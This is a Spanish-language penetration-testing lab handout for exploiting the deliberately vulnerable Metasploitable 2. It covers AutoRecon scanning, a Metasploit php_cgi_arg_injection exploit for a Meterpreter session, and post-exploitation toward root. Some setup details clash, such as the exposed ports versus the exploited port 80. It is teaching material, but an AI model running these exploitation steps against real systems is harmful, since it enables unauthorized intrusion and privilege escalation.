Lab 5: Pentesting Autónomo con AutoRecon y Metasploit
Objetivo
Ejecutar un pentest automatizado en Metasploitable 2, documentando el proceso completo.
Prerrequisitos
- Docker o VM con Metasploitable 2
- Kali Linux con AutoRecon y Metasploit
Entorno
# Levantar Metasploitable 2
docker run -d -p 2222:22 -p 3306:3306 --name metasploitable2 tleemcjr/metasploitable2
# IP objetivo
export TARGET=192.168.56.5Escenario
Ejecuta un pentest automatizado completo en Metasploitable 2, desde reconocimiento hasta explotación.
Pasos
Paso 1: AutoRecon
# Escaneo automatizado
python3 autorecon.py $TARGET -vv
# Revisar resultados en ./results/
ls -la results/Paso 2: Metasploit
# Iniciar Metasploit
msfconsole
# Buscar exploits
search type:exploit platform:linux target:unix
# Usar exploit
use exploit/multi/http/php_cgi_arg_injection
set RHOSTS $TARGET
set RPORT 80
runPaso 3: Post-Explotación
# En Meterpreter
sysinfo
getuid
shell
# Escalamiento
background
use post/linux/...Entregable
Archivo: pentest_autonomo.md
Incluir: - Resultados de AutoRecon - Exploit utilizado - Shell obtenida - Hallazgos priorizados
Resultado Esperado
Al completar el lab, el estudiante debe haber ejecutado el ciclo completo de pentest automatizado:
- AutoRecon completado: Directorio
results/$TARGET/generado con subdirectorios por servicio (ej.tcp80/,tcp22/) y al menos 5 servicios identificados con versiones. - Sesión Meterpreter activa: Output en terminal mostrando el prompt
meterpreter >con el resultado desysinfoconfirmando acceso al objetivo (OS: Linux metasploitable). - Usuario root obtenido: Output de
getuidmostrandoServer username: rooto equivalente con privilegios elevados. - Encadenamiento documentado: Al menos 2 vulnerabilidades distintas explotadas en secuencia (ej.
php_cgi_arg_injection→ escalamiento local).
Evidencia mínima aceptable: - Captura del prompt Meterpreter con sysinfo y getuid. - Listado de ls results/ mostrando la estructura de AutoRecon.